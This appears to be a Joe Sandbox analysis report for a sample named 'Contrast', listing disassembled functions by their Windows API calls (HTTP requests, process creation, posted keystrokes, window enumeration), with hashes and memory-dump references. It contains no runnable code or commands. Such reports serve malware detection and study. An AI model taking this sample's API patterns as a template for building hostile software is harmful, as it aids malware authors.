                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                        • Opcode ID: 3adedb2392134bcd8b1c33b633f8b9b375aa9542b635228dd4a638694735908d
                                                                                                                                        • Instruction ID: 95c0040f4291b4cbcdfcd2475399577d717ccc05aac6df207310fa46cb9d37cc
                                                                                                                                        • Opcode Fuzzy Hash: 3adedb2392134bcd8b1c33b633f8b9b375aa9542b635228dd4a638694735908d
                                                                                                                                        • Instruction Fuzzy Hash: A2A1B234302213CFDB19EF14D4A9A69FB64FF55741F1042ADE80AAB2A1DB30AD56CF91
                                                                                                                                        APIs
                                                                                                                                        • EnumChildWindows.USER32(?,0056B13A), ref: 0056B078
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                        • Opcode ID: 0ee1724c93b33f33d6e61888cff9300d3f07e0c50f8b6a58266f55774f656653
                                                                                                                                        • Instruction ID: c0c99ace6a77dd15dd06524f310f22968605b3b3d84cae3df6cfc9c7355546fd
                                                                                                                                        • Opcode Fuzzy Hash: 0ee1724c93b33f33d6e61888cff9300d3f07e0c50f8b6a58266f55774f656653
                                                                                                                                        • Instruction Fuzzy Hash: 5791B370A00616EADB18EFA0C485BEEFFB4FF54314F108519E85AB7291DF306999CB91
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0051327E
                                                                                                                                          • Part of subcall function 0051218F: GetClientRect.USER32(?,?), ref: 005121B8
                                                                                                                                          • Part of subcall function 0051218F: GetWindowRect.USER32(?,?), ref: 005121F9
                                                                                                                                          • Part of subcall function 0051218F: ScreenToClient.USER32(?,?), ref: 00512221
                                                                                                                                        • GetDC.USER32 ref: 0054D073
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054D086
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0054D094
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0054D0A9
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054D0B1
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054D13C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                        • Opcode ID: 1a54ba4bfdd4d4bb662172637d0583c4a879c3a69117fb3a5fabd3018117c7ff
                                                                                                                                        • Instruction ID: c82111e4084ca97574b1146565298e4bf2e477c18de3ead60887df6d5fb47d57
                                                                                                                                        • Opcode Fuzzy Hash: 1a54ba4bfdd4d4bb662172637d0583c4a879c3a69117fb3a5fabd3018117c7ff
                                                                                                                                        • Instruction Fuzzy Hash: AB71EF30400209EFDF219F64C888AEA7FB5FF49328F14466AED595B1A6D7318D85EF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                          • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                                                                                                                                          • Part of subcall function 00512714: ScreenToClient.USER32(005D77B0,?), ref: 00512744
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0059C69C
                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 0059C6A2
                                                                                                                                        • ReleaseCapture.USER32 ref: 0059C6A8
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0059C752
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0059C765
                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0059C847
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                        • Opcode ID: 4ab542a0246c25ede1df7fd1c3bee83d3f0303b549ab89fff04aea4c939d7b84
                                                                                                                                        • Instruction ID: 7da967f22d506f280124b4179777e3e9bad004b6a5664f7c2c03855a7fdc3165
                                                                                                                                        • Opcode Fuzzy Hash: 4ab542a0246c25ede1df7fd1c3bee83d3f0303b549ab89fff04aea4c939d7b84
                                                                                                                                        • Instruction Fuzzy Hash: 2E518870608205AFEB10EF24CC59FAA7FE1FB99310F00491EF595872E1DB30A948DB52
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058211C
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00582148
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0058218A
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058219F
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005821AC
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005821DC
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00582223
                                                                                                                                          • Part of subcall function 00582B4F: GetLastError.KERNEL32(?,?,00581EE3,00000000,00000000,00000001), ref: 00582B64
                                                                                                                                          • Part of subcall function 00582B4F: SetEvent.KERNEL32(?,?,00581EE3,00000000,00000000,00000001), ref: 00582B79
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2603140658-3916222277
                                                                                                                                        • Opcode ID: 2f17e85f934d58dfa95de2c9ea0fd4dcde97cedf8eed90c4133ef34039c6d292
                                                                                                                                        • Instruction ID: a6cd481c26323d028cb6d5a90f4e4acfe62de4d26176d1b0f6f56345bbaa1ec9
                                                                                                                                        • Opcode Fuzzy Hash: 2f17e85f934d58dfa95de2c9ea0fd4dcde97cedf8eed90c4133ef34039c6d292
                                                                                                                                        • Instruction Fuzzy Hash: 76416AB5501219BEEB12AF50CC89FBB7FACFB49350F104116FE06AA191D770AE449BA1
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,005A0980), ref: 00589412
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005A0980), ref: 00589446
                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005895C0
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005895EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 560350794-0
                                                                                                                                        • Opcode ID: 6fe32d322904358dfc6af3d621809f27c5eb704e350097a004a41269c2a302ef
                                                                                                                                        • Instruction ID: 1ee3f774c9c7557659c701aabcff7ad0e537c32e8bf594d22c5025029490da8a
                                                                                                                                        • Opcode Fuzzy Hash: 6fe32d322904358dfc6af3d621809f27c5eb704e350097a004a41269c2a302ef
                                                                                                                                        • Instruction Fuzzy Hash: 9EF10B75A00209EFDB14EF94C884EBEBBB5FF89314F148458F916AB251DB31AE45CB50
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0058FD9E
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF31
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF55
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF95
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FFB7
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00590133
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00590165
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00590194
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059020B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4090791747-0
                                                                                                                                        • Opcode ID: 8584954fc705ac359b910ec09ad5cf7cf874bb6661e864e31a9a0dfdec51ca1f
                                                                                                                                        • Instruction ID: f98505a595a457ec79664476037e91c011087831f6cef6627a4566e3e6d6ef25
                                                                                                                                        • Opcode Fuzzy Hash: 8584954fc705ac359b910ec09ad5cf7cf874bb6661e864e31a9a0dfdec51ca1f
                                                                                                                                        • Instruction Fuzzy Hash: 9BE1A131204702DFDB14EF24D899A6ABFE5BF89310F14885DF9899B2A2DB31DC45CB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573B8A,?), ref: 00574BE0
                                                                                                                                          • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573B8A,?), ref: 00574BF9
                                                                                                                                          • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 005752FB
                                                                                                                                        • _wcscmp.LIBCMT ref: 00575315
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00575330
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 793581249-0
                                                                                                                                        • Opcode ID: 0af9ae436a809a09aec0b6ea90164928a56a97db31b8c3ebac1ebfd19fe19b9e
                                                                                                                                        • Instruction ID: 7da809d815676d9be9e7cfce954ace58e6fa63eeb80bf789c51e1380d66b6659
                                                                                                                                        • Opcode Fuzzy Hash: 0af9ae436a809a09aec0b6ea90164928a56a97db31b8c3ebac1ebfd19fe19b9e
                                                                                                                                        • Instruction Fuzzy Hash: 805196B10087955BC724EBA4E8859DFBBECBFC5300F00492EF189D3152EF70A6888756
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00598D24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: fca332420199def0934ff13c7b34c3d49f0e15bbcc5496b09bf2bbb8d642ce66
                                                                                                                                        • Instruction ID: db1b4a60fb9c1e4b76ec2ca91cc59f6376d037aa8c9ef9905b2144f79a164ff7
                                                                                                                                        • Opcode Fuzzy Hash: fca332420199def0934ff13c7b34c3d49f0e15bbcc5496b09bf2bbb8d642ce66
                                                                                                                                        • Instruction Fuzzy Hash: EF518D30641209BFEF209F28CC89BB97FA8BB56310F244516FA15EB1E1CF75AD949A50
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C638
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C65A
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C672
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C690
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C6B1
                                                                                                                                        • DestroyIcon.USER32(00000000), ref: 0054C6C0
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C6DD
                                                                                                                                        • DestroyIcon.USER32(?), ref: 0054C6EC
                                                                                                                                          • Part of subcall function 0059AAD4: DeleteObject.GDI32(00000000), ref: 0059AB0D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2819616528-0
                                                                                                                                        • Opcode ID: 4f1467e4cd2ecfdd71161261543515197d50994c88b653013b23316dcd91e603
                                                                                                                                        • Instruction ID: 207a409c004f5bdad81806219b4a5c4a31ebfe5c95c6a35a31c2b9babb5859a4
                                                                                                                                        • Opcode Fuzzy Hash: 4f1467e4cd2ecfdd71161261543515197d50994c88b653013b23316dcd91e603
                                                                                                                                        • Instruction Fuzzy Hash: D0517C70611209AFEB20DF28CC46BAA7FB5FB98710F104919F906D72D0DB71ACA5EB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0056B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056B54D
                                                                                                                                          • Part of subcall function 0056B52D: GetCurrentThreadId.KERNEL32 ref: 0056B554
                                                                                                                                          • Part of subcall function 0056B52D: AttachThreadInput.USER32(00000000,?,0056A23B,?,00000001), ref: 0056B55B
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A246
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0056A263
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0056A266
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A26F
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0056A28D
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A290
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A299
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0056A2B0
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A2B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                        • Opcode ID: 5fc7590a41c3bab081a0c65e1a4d2bd14e060d41c770a0a44a2dd7cf34fce0e4
                                                                                                                                        • Instruction ID: 6d78cc5194a7f114232da5e839e29f8e3b3e7c7008d372648a5b6d7d4b5f66ce
                                                                                                                                        • Opcode Fuzzy Hash: 5fc7590a41c3bab081a0c65e1a4d2bd14e060d41c770a0a44a2dd7cf34fce0e4
                                                                                                                                        • Instruction Fuzzy Hash: 2D11E571560218BEFA106F609C89FAA3F1DEB9D794F101415F3406B0D0CAF35C50EEA0
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0056915A,00000B00,?,?), ref: 005694E2
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 005694E9
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0056915A,00000B00,?,?), ref: 005694FE
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0056915A,00000B00,?,?), ref: 00569506
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 00569509
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0056915A,00000B00,?,?), ref: 00569519
                                                                                                                                        • GetCurrentProcess.KERNEL32(0056915A,00000000,?,0056915A,00000B00,?,?), ref: 00569521
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 00569524
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0056954A,00000000,00000000,00000000), ref: 0056953E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                        • Opcode ID: c80cba34f2c3d813dd4edcfaae655331e04b2cc4cecbe0747cda7ea9e6c87a3a
                                                                                                                                        • Instruction ID: 4f0f4fa277f041a07d6fec4fcf0a8b79730cbf16ad8739308814c83f1b240b8b
                                                                                                                                        • Opcode Fuzzy Hash: c80cba34f2c3d813dd4edcfaae655331e04b2cc4cecbe0747cda7ea9e6c87a3a
                                                                                                                                        • Instruction Fuzzy Hash: 2201BBB5250304BFE710ABA5DC4DFAB7BACEB99711F005411FA05DB1E1DA74D804DB20
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                        • Opcode ID: f755d147fe895aca7ead7e706c6f55def98f67779f10e821a63598b2e1f6b7d1
                                                                                                                                        • Instruction ID: 69c245267962b34438a6280ac185daf3823cc1ed27b19b6224f977c6b5eb6d42
                                                                                                                                        • Opcode Fuzzy Hash: f755d147fe895aca7ead7e706c6f55def98f67779f10e821a63598b2e1f6b7d1
                                                                                                                                        • Instruction Fuzzy Hash: BFC19371A0021A9FEF14EF98C885AAEBBB5FB48314F14846AED05B7281E770ED45CB51
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
